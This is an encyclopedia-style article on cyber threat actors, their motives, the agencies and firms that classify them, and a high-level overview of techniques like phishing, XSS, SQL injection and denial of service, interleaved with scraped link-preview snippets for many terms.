A threat actor or malicious actor is either a person or a group of people that take part in an action that is intended to cause harm to the cyber realm including:
computer
A computer is a machine that can be programmed to Execution (computing), carry out sequences of arithmetic or logical operations (computation) automatically. Modern digital electronic computers can perform generic sets of operations known as C ...
s, devices,
system
A system is a group of Interaction, interacting or interrelated elements that act according to a set of rules to form a unified whole. A system, surrounded and influenced by its environment (systems), environment, is described by its boundaries, ...
s, or
networks
Network, networking and networked may refer to:
Science and technology
* Network theory, the study of graphs as a representation of relations between discrete objects
* Network science, an academic field that studies complex networks
Mathematics
...
.
The term is typically used to describe individuals or groups that perform
malicious acts against a person or an organization of any type or size.
Threat
A threat is a communication of intent to inflict harm or loss on another person. Intimidation is a tactic used between conflicting parties to make the other timid or psychologically insecure for coercion or control. The act of intimidation for co ...
actors engage in cyber related offenses to exploit open
vulnerabilities
Vulnerability refers to "the quality or state of being exposed to the possibility of being attacked or harmed, either physically or emotionally."
A window of vulnerability (WOV) is a time frame within which defensive measures are diminished, com ...
and disrupt operations.
Threat actors have different educational backgrounds, skills, and resources.
The frequency and classification of cyber attacks changes rapidly. The background of threat actors helps dictate who they target, how they attack, and what information they seek. There are a number of threat actors including:
cyber criminals
A cybercrime is a crime that involves a computer or a computer network.Moore, R. (2005) "Cyber crime: Investigating High-Technology Computer Crime," Cleveland, Mississippi: Anderson Publishing. The computer may have been used in committing the ...
,
nation-state
A nation state is a political unit where the state and nation are congruent. It is a more precise concept than "country", since a country does not need to have a predominant ethnic group.
A nation, in the sense of a common ethnicity, may inc ...
actors,
ideologues
An ideology is a set of beliefs or philosophies attributed to a person or group of persons, especially those held for reasons that are not purely epistemic, in which "practical elements are as prominent as theoretical ones." Formerly applied prim ...
, thrill seekers/trolls, insiders, and competitors.
These threat actors all have distinct motivations, techniques, targets, and uses of stolen data.
Background
The development of
cyberspace
Cyberspace is a concept describing a widespread interconnected digital technology. "The expression dates back from the first decade of the diffusion of the internet. It refers to the online world as a world 'apart', as distinct from everyday rea ...
has brought both advantages and disadvantages to society. While cyberspace has helped further technological innovation, it has also brought various forms of
cyber crime
A cybercrime is a crime that involves a computer or a computer network.Moore, R. (2005) "Cyber crime: Investigating High-Technology Computer Crime," Cleveland, Mississippi: Anderson Publishing. The computer may have been used in committing ...
.
Since the dawn of cyberspace, individual, group, and nation-state threat actors have engaged in cyber related offenses to exploit victim vulnerabilities.
There are a number of threat actor categories who have different motives and targets.
Financially motivated actors
Cyber criminals have two main objectives. First, they want to take infiltrate a system to access valuable data or items. Second, they want to ensure that they avoid legal consequence after infiltrating a system. Cyber criminal can be broken down into three sub-groups: mass
scammers
A confidence trick is an attempt to defraud a person or group after first gaining their trust. Confidence tricks exploit victims using their credulity, naïveté, compassion, vanity, confidence, irresponsibility, and greed. Researchers have de ...
/automated hackers, criminal infrastructure providers, and big game hunters.
Mass scammers and automated hackers include cyber criminals who attacks a system to gain
monetary success. These threat actors use tools to infect organization computer systems. They then seek to gain financial compensation for victims to retrieve their data.
Criminal infrastructure providers are a group of threat actors that aim to use tools to infect a computer system of an organization. Criminal infrastructure providers then sell the organization's infrastructure to an outside organization so they can exploit the system. Typically, victims of criminal infrastructure providers are unaware that their system has been infected.
Big game hunters are another sub-group of cyber criminals that aim to attack one single, but high-value target. Big game hunters spend extra time learning about their target, including system architecture and other technologies used by their target. Victims can be targeted by email, phone attacks or by social engineering skills.
Nation-state actors
Nation-state threat actors aim to gain
intelligence
Intelligence has been defined in many ways: the capacity for abstraction, logic, understanding, self-awareness, learning, emotional knowledge, reasoning, planning, creativity, critical thinking, and problem-solving. More generally, it can b ...
of national interest. Nation-state actors can be interested in a number of sectors, including
nuclear
Nuclear may refer to:
Physics
Relating to the nucleus of the atom:
* Nuclear engineering
*Nuclear physics
*Nuclear power
*Nuclear reactor
*Nuclear weapon
*Nuclear medicine
*Radiation therapy
*Nuclear warfare
Mathematics
*Nuclear space
*Nuclear ...
,
financial
Finance is the study and discipline of money, currency and capital assets. It is related to, but not synonymous with economics, the study of production, distribution, and consumption of money, assets, goods and services (the discipline of fina ...
, and
technology
Technology is the application of knowledge to reach practical goals in a specifiable and reproducible way. The word ''technology'' may also mean the product of such an endeavor. The use of technology is widely prevalent in medicine, science, ...
information.
There are two ways nations use nation-state actors. First, some nations make use of their own governmental intelligence agencies. Second, some nations work with organizations that specialize in cyber crime. States that use outside groups can be tracked; however, states might not necessarily take accountability for the act conducted by the outside group. Nation-state actors can attack both other nations or other outside organizations, including private companies and non-governmental organizations. They typically aim to bolster their nation-state's counterintelligence strategy.
Nation-state attacks can include:
strategic sabotage or
critical infrastructure attacks. Nation states considered an incredibly large group of threat actors in the cyber realm.
Ideologues (hacktivists and terrorists)
Threat actors that are considered ideologues include two groups of attackers:
hacker
A hacker is a person skilled in information technology who uses their technical knowledge to achieve a goal or overcome an obstacle, within a computerized system by non-standard means. Though the term ''hacker'' has become associated in popu ...
s and
terrorists
Terrorism, in its broadest sense, is the use of criminal violence to provoke a state of terror or fear, mostly with the intention to achieve political or religious aims. The term is used in this regard primarily to refer to intentional violen ...
. These two groups of attackers can be grouped together because they are similar in goals. However, hacktivists and terrorists differ in how they commit cyber crimes.
Hacktivism
In Internet activism, hacktivism, or hactivism (a portmanteau of ''hack'' and ''activism''), is the use of computer-based techniques such as hacking as a form of civil disobedience to promote a political agenda or social change. With roots in hack ...
is a term that was coined in the early days of the World Wide Web. It is derived from a combination of two words: hacking and
activism
Activism (or Advocacy) consists of efforts to promote, impede, direct or intervene in Social change, social, Political campaign, political, economic or Natural environment, environmental reform with the desire to make Social change, changes i ...
.
Hacktivists typically are individuals or entities that are ready to commit cyber crimes to further their own beliefs and ideologues.
Many hactivists include
anti-capitalists
Anti-capitalism is a political ideology and Political movement, movement encompassing a variety of attitudes and ideas that oppose capitalism. In this sense, anti-capitalists are those who wish to replace capitalism with another type of economi ...
or
anti-corporate
Anti-corporate activism refers to the idea of activism that is directed against the private sector, and specifically against larger corporations. It stems from the idea that the activities and impacts of big business are detrimental to the pu ...
idealists and their attacks are inspired by similar
political
Politics (from , ) is the set of activities that are associated with making decisions in groups, or other forms of power relations among individuals, such as the distribution of resources or status. The branch of social science that studies ...
and
social issue
A social issue is a problem that affects many people within a society. It is a group of common problems in present-day society and ones that many people strive to solve. It is often the consequence of factors extending beyond an individual's cont ...
s.
Terrorism includes individuals or groups of people that aim to cause terror to achieve their goals. The main difference between hacktivists and terrorists is their end goal. Hacktivists are willing to break security laws to spread their message while terrorists aim to cause terror to achieve their goals. Ideologues, unlike other types of threat actors, are typically not motivated by financial incentives.
Thrill seekers and trolls
A thrill seeker is a type of threat actor that attacks a system for the sole purpose of experimentation.
Thrill seekers are interested in learning more about how computer systems and networks operate and want to see how much data they can infiltrate within a computer system. While they do not aim to cause major damage, they can cause problems to an organization's system. As time has gone on, thrill seekers have evolved into modern trolls. Similar to thrill seekers, a troll is a type of person or group that attacks a system for recreation. However, unlike thrill seekers, trolls aim to cause malice.
Modern day trolls can cause
misinformation
Misinformation is incorrect or misleading information. It differs from disinformation, which is ''deliberately'' deceptive. Rumors are information not attributed to any particular source, and so are unreliable and often unverified, but can turn ou ...
and harm.
Insiders and competitors
Insiders are a type of threat actor that can either be an insider who sells network information to other adversaries, or it can be a disgruntled employee who feels like they need to
retaliate
Revenge is committing a harmful action against a person or group in response to a grievance, be it real or perceived. Francis Bacon described revenge as a kind of "wild justice" that "does... offend the law ndputteth the law out of office." Pr ...
because they feel like they have been treated unfairly.
Insider attacks can be challenging to prevent; however, with a structured logging and analysis plan in place, insider threat actors can be detected after a successful attack.
Business competitors can be another threat actor that can harm organizations. Competitors can gain access to organization secrets that are typically secure. Organizations can try to gain a stronger knowledge of business intelligence to protect themselves against a competition threat actor.
Identified threat actors
Internet Research Agency
The Internet Research Agency (IRA; russian: Агентство интернет-исследований, translit=Agentstvo internet-issledovaniy), also known as ''Glavset'' (russian: link=no, Главсеть) and known in Russian Internet sla ...
Organizations that identify threat actors
Government organizations
United States (US) - National Institute for Standards and Technology (NIST)
The
National Institute for Standards and Technology
The National Institute of Standards and Technology (NIST) is an agency of the United States Department of Commerce whose mission is to promote American innovation and industrial competitiveness. NIST's activities are organized into Outline of p ...
(NIST) is a government agency that works on issues dealing with cyber security on the national level. NIST has written reports on cyber security guidelines, including guidelines on conducting risk assessments. NIST typically classifies cyber threat actors as national governments, terrorists, organized crime groups, hactivists, and hackers.
European Union (EU) - The European Union Agency for Cybersecurity (ENISA)
The
European Union
The European Union (EU) is a supranational political and economic union of member states that are located primarily in Europe. The union has a total area of and an estimated total population of about 447million. The EU has often been des ...
Agency for Cybersecurity is a European Union-based agency tasked in working on cyber security capabilities. The ENISA provides both research and assistance to information security experts within the EU.
This organization published a cyber threat report up until 2019. The goal of this report is to identify incidents that have been published and attribute those attacks to the most likely threat actor. The latest report identifies nation-states, cyber criminals, hactivists, cyber terrorists, and thrill seekers.
United Nations (UN)
The
United Nations
The United Nations (UN) is an intergovernmental organization whose stated purposes are to maintain international peace and international security, security, develop friendly relations among nations, achieve international cooperation, and be ...
General Assembly
A general assembly or general meeting is a meeting of all the members of an organization or shareholders of a company.
Specific examples of general assembly include:
Churches
* General Assembly (presbyterian church), the highest court of presby ...
(UNGA) has also been working to bring awareness to issues in cyber security. The UNGA came out with a report in 2019 regarding the developments in the field of information and telecommunications in the context of international security.
This report has identified the following threat actors: nation-states, cyber criminals, hactivists, terrorist groups, thrill seekers, and insiders.
Canada - Canadian Centre for Cyber Security (CCCS)
Canada
Canada is a country in North America. Its ten provinces and three territories extend from the Atlantic Ocean to the Pacific Ocean and northward into the Arctic Ocean, covering over , making it the world's second-largest country by tot ...
defines threat actors as states, groups, or individuals who aim to cause harm by exploiting a vulnerability with malicious intent. A threat actor must be trying to gain access to information systems to access or alter data, devices, systems, or networks.
Japan - National Center of Incident Readiness and Strategy (NISC)
The
Japan
Japan ( ja, 日本, or , and formally , ''Nihonkoku'') is an island country in East Asia. It is situated in the northwest Pacific Ocean, and is bordered on the west by the Sea of Japan, while extending from the Sea of Okhotsk in the north ...
ese government's National Center of Incident Readiness and Strategy (NISC) was established in 2015 to create a "free, fair and secure cyberspace" in Japan. The NICS created a cybersecurity strategy in 2018 that outlines nation-states and cybercrime to be some of the most key threats.
It also indicates that terrorist usage of the cyberspace needs to be monitored and understood.
Russia - Security Council of the Russian Federation
The Security Council of the
Russian Federation
Russia (, , ), or the Russian Federation, is a List of transcontinental countries, transcontinental country spanning Eastern Europe and North Asia, Northern Asia. It is the List of countries and dependencies by area, largest country in the ...
published the cyber security strategy doctrine in 2016.
This strategy highlights the following threat actors as a risk to cyber security measures: nation-state actors, cyber criminals, and terrorists.
Non-Government Organizations
CrowdStrike
CrowdStrike
CrowdStrike Holdings, Inc. is an American cybersecurity technology company based in Austin, Texas. It provides cloud workload and endpoint security, threat intelligence, and cyberattack response services. The company has been involved in inves ...
is a cybersecurity technology company and antivirus company that publishes an annual threat report. The 2021 Global Threat Report reports nation-states and cybercriminals as two major threats to cyber security.
FireEye
FireEye
Trellix (formerly FireEye and McAfee Enterprise) is a privately held cybersecurity company founded in 2022. It has been involved in the detection and prevention of major cyber attacks.
It provides hardware, software, and services to investigat ...
is a cybersecurity firm that is involved with detecting and preventing cyber attacks. It publishes a report on detected threat trends annually, containing results from their customers sensor systems. Their threat report lists state sponsored actors, cyber criminals and insiders as current threats.
McAfee
McAfee
McAfee Corp. ( ), formerly known as McAfee Associates, Inc. from 1987 to 1997 and 2004 to 2014, Network Associates Inc. from 1997 to 2004, and Intel Security Group from 2014 to 2017, is an American global computer security software company head ...
is an American global computer security software company. The company publishes a quarterly threat report that identifies key issues in cybersecurity.
The October 2021 threat report outlines cybercriminals as one of the biggest threats in the field.
Verizon
Verizon
Verizon Communications Inc., commonly known as Verizon, is an American multinational telecommunications conglomerate and a corporate component of the Dow Jones Industrial Average. The company is headquartered at 1095 Avenue of the Americas in ...
is an American multinational telecommunications company that has provided a threat report based on past customer incidents. They ask the following questions when defining threat actors: "Who is behind the event? This could be the external “bad guy” who launches a phishing campaign or an employee who leaves sensitive documents in their seat back pocket".
They outline nation state actors and cybercriminals as two types of threat actors in their report.
Techniques
Phishing
Phishing
Phishing is a type of social engineering where an attacker sends a fraudulent (e.g., spoofed, fake, or otherwise deceptive) message designed to trick a person into revealing sensitive information to the attacker or to deploy malicious softwar ...
is one method that threat actors use to obtain sensitive data, including usernames, passwords, credit card information, and social security numbers. Phishing attacks typically occur when a threat actor sends a message designed to trick a victim into either revealing
sensitive information
Information sensitivity is the control of access to information or knowledge that might result in loss of an advantage or level of security if disclosed to others.
Loss, misuse, modification, or unauthorized access to sensitive information can ...
to the threat actor or to deploy malicious software on the victim's system.
Cross-Site Scripting
Cross-site scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may ...
is a type of security vulnerability that can be found when a threat actor injects a client-side script into an otherwise safe and trusted
web application
A web application (or web app) is application software that is accessed using a web browser. Web applications are delivered on the World Wide Web to users with an active network connection.
History
In earlier computing models like client-serve ...
s.
The code then launches an infectious script onto a victim's system. This allows a threat actor to access sensitive data.
[{{Cite web, title=What is a Web Application Firewall? {{! WAF Explained {{! CrowdStrike, url=https://www.crowdstrike.com/cybersecurity-101/web-application-firewall/, access-date=2021-12-08, website=crowdstrike.com, language=en]
SQL Injections
SQL injection
In computing, SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL inj ...
is a
code injection
Code injection is the exploitation of a computer bug that is caused by processing invalid data. The injection is used by an attacker to introduce (or "inject") code into a vulnerable computer program and change the course of execution. The re ...
technique used by threat actors to
attack any data-driven applications. Threat actors can inject malicious
SQL statements. This allows threat actors to extract, alter, or delete victim's information.
Denial of Service Attacks
A
denial-of-service attack
In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connect ...
(DoS attack) is a
cyber-attack
A cyberattack is any offensive maneuver that targets computer information systems, computer networks, infrastructures, or personal computer devices. An attacker is a person or process that attempts to access data, functions, or other restricted ...
in which a threat actor seeks to make an automated resource unavailable to its victims by temporarily or indefinitely disrupting
services
Service may refer to:
Activities
* Administrative service, a required part of the workload of university faculty
* Civil service, the body of employees of a government
* Community service, volunteer service for the benefit of a community or a p ...
of a network host. Threat actors conduct a DoS attack by overwhelming a network with false requests to disrupt operations.
References
Safety analysis
Hacker groups